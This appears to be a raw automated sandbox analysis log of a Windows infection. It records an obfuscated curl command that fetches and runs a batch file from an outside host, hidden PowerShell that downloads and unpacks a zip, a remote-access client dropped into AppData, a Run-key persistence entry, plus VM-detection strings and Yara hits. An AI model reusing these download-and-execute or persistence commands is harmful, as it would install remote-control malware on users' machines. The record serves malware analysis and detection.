Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V rytllcpqlndyltx Bus
Source: chrome.exe, 00000000.00000002.2431215679.000001E4A7538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid Partition
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: chrome.exe, 00000000.00000003.1816401838.000028EC02578000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware20,1(
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration ServiceS
Source: explorer.exe, 00000016.00000000.1599850643.00000000009A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000}
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB199000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &Hyper-V HypervisorsY^
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisorr.
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: curl.exe, 0000001E.00000003.1778104266.000001366F8D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition*+h
Source: explorer.exe, 00000016.00000000.1609515483.00000000086D5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipesl
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: explorer.exe, 00000016.00000000.1609515483.00000000087E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration ServiceA
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: VMWare
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processorc.sys
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.VMW201.00V.21805430.B64.230522183005/22/2023
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid Partitionll;
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB199000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid PartitionllEQ
Source: explorer.exe, 00000016.00000000.1609515483.00000000087E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=1292e4ad-0700-4406-abe9-f5f1f5a6abb7
Source: C:\Users\user\AppData\Roaming\Options\client32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 37_2_11161D01
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState, 37_2_11147750
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11145440 _memset,GetVersionExA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDefaultLangID, 37_2_11145440
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1108BF30 GetTokenInformation,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,IsValidSid,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 37_2_1108BF30
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle, 37_2_11093080
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter, 37_2_110310C0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_1116DD89
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CCA28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 37_2_6CCA28E1
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CCA87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_6CCA87F5
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError, 37_2_110F4560
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event, 37_2_1111FCA0
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Options\client32.exe "C:\Users\user\AppData\Roaming\Options\client32.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent, 37_2_1109E190
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid, 37_2_1109E910
Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000000.1600276653.0000000000F60000.00000002.00000001.00040000.00000007.sdmp Binary or memory string: Program ManagerKO
Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000002.2431995358.00000000043D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1602122423.00000000043D0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000016.00000003.2240395779.0000000008909000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1609515483.0000000008834000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWndX
Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000000.1600276653.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, client32.exe Binary or memory string: Progman
Source: explorer.exe, 00000016.00000000.1599850643.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2412632825.00000000009AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +Progman
Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000000.1600276653.0000000000F60000.00000002.00000001.00040000.00000007.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 37_2_11173A35
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 37_2_11173D69
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 37_2_11173CC6
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: GetLocaleInfoA, 37_2_1116B38E
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 37_2_11173933
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 37_2_111739DA
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 37_2_1117383E
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 37_2_11173D2D
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 37_2_11173C06
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 37_2_6CCB0F39
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 37_2_6CCB2089
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 37_2_6CCB21DC
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: EnumSystemLocalesA, 37_2_6CCB2151
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 37_2_6CCB2175
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 37_2_6CCB02AD
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 37_2_6CCB2218
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 37_2_6CCB1CC1
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: GetLocaleInfoA, 37_2_6CCBDC99
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 37_2_6CCBDC56
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 37_2_6CCB1DB6
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 37_2_6CCB1EB8
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 37_2_6CCB1E5D
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 37_2_6CCAFAE1
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 37_2_6CCBDB7C
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 37_2_6CCB1680
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA30486 CreateNamedPipeW, 34_2_00007FFC8BA30486
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11177075 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 37_2_11177075
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA, 37_2_1103B160
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 37_2_11174AE9
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111450A0 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey, 37_2_111450A0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep, 37_2_11070090
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError, 37_2_110D8200
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC8A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange, 37_2_6CC8A980
Source: Yara match File source: 37.0.client32.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.client32.exe.707b0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.powershell.exe.28fcf164fe0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.powershell.exe.28fcf0141a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.client32.exe.6cf80000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.powershell.exe.28fcf01e3f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.client32.exe.111b79e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.client32.exe.6cc80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2412047042.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2428598700.00000000111E1000.00000004.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.1919964679.0000000000D3F000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1908768239.0000028FCF157000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.1919964679.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2428248444.0000000011193000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2500, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: client32.exe PID: 6788, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\client32.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\pcicapi.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\PCICHEK.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\PCICL32.DLL, type: DROPPED